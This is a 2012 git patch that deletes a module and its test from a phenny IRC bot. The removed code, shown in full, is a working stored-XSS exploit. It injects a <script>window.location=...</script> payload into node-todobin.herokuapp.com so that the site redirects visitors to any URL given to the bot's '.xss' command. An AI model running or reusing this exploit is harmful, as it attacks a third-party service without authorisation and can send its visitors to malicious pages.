From f8e2afbb9d8ee1cf6afee5c6dfae5eec2a533a1a Mon Sep 17 00:00:00 2001
From: mutantmonkey <mutantmonkey@mutantmonkey.in>
Date: Wed, 5 Dec 2012 15:17:04 -0500
Subject: [PATCH] remove broken nodetodo module

---
 modules/nodetodo.py           | 69 -----------------------------------
 modules/test/test_nodetodo.py | 23 ------------
 2 files changed, 92 deletions(-)
 delete mode 100644 modules/nodetodo.py
 delete mode 100644 modules/test/test_nodetodo.py

diff --git a/modules/nodetodo.py b/modules/nodetodo.py
deleted file mode 100644
index 686c16e..0000000
--- a/modules/nodetodo.py
+++ /dev/null
@@ -1,69 +0,0 @@
-#!/usr/bin/python3
-"""
-nodetodo.py - node-todo uploader
-author: mutantmonkey <mutantmonkey@mutantmonkey.in>
-author: telnoratti <calvin@winkowski.me>
-"""
-
-from urllib.error import HTTPError
-from urllib import request
-from tools import GrumbleError
-import web
-import json
-
-def xss(phenny, input):
-    """.xss <url> - Upload a URL to an XSS vulnerability in node-todobin.herokuapp.com."""
-
-    url = input.group(2)
-    if not url:
-        phenny.reply("No URL provided.")
-        return
-
-    if not url.startswith('http'):
-        url = ''.join(['http://', url])
-
-    try:
-        url = urlshortener(url)
-    except (HTTPError, IOError):
-        raise GrumbleError("THE INTERNET IS FUCKING BROKEN. Please try again later.")
-
-    phenny.reply(url)
-xss.rule = (['xss'], r'(.*)')
-
-
-
-def urlshortener(longurl):
-    xss = ''.join(["""{"status":false,"text":"<script>window.location='""", longurl, """'</script>"}"""])
-    xss = xss.encode()
-    r = request.urlopen('http://node-todobin.herokuapp.com/list')
-    cookie = r.info().get('Set-Cookie').partition('=')[2].partition(';')[0]
-
-    r = request.Request('http://node-todobin.herokuapp.com/api/todos', 
-        headers={
-            'Content-Type': 'application/json',
-            'Accept': 'application/json, text/javascript, */*',
-            'Cookie': cookie,
-        }, data=b'{"id":null}')
-    opener = request.build_opener(request.HTTPHandler)
-    response = opener.open(r)
-    data = response.read()
-    js = json.loads(data.decode('utf-8'))
-    uri = js.get('uri')
-    url = '/'.join(['http://node-todobin.herokuapp.com/api/todos', uri])
-    newurl = '/'.join(['http://node-todobin.herokuapp.com/list', uri])
-
-    request.urlopen(url)
-    request.urlopen(newurl)
-    r = request.Request(url, 
-        headers={
-            'Content-Type': 'application/json',
-            'Accept': 'application/json, text/javascript, */*',
-            'Cookie': cookie,
-        }, data=xss)
-    
-    opener.open(r)
-
-    return newurl
-
-if __name__ == '__main__':
-    print(__doc__.strip())
diff --git a/modules/test/test_nodetodo.py b/modules/test/test_nodetodo.py
deleted file mode 100644
index 31b9ea3..0000000
--- a/modules/test/test_nodetodo.py
+++ /dev/null
@@ -1,23 +0,0 @@
-"""
-test_nodetodo.py - tests for the node-todo xss module
-author: mutantmonkey <mutantmonkey@mutantmonkey.in>
-"""
-
-import re
-import unittest
-from mock import MagicMock, Mock
-from modules.nodetodo import xss, urlshortener
-
-
-class TestNodeTodo(unittest.TestCase):
-    def setUp(self):
-        self.phenny = MagicMock()
-
-    def test_xss(self):
-        input = Mock(group=lambda x: 'http://vtluug.org/')
-        xss(self.phenny, input)
-
-        out = self.phenny.reply.call_args[0][0]
-        m = re.match('^http://node-todobin\.herokuapp\.com/list/[a-z0-9]+$',
-                out, flags=re.UNICODE)
-        self.assertTrue(m)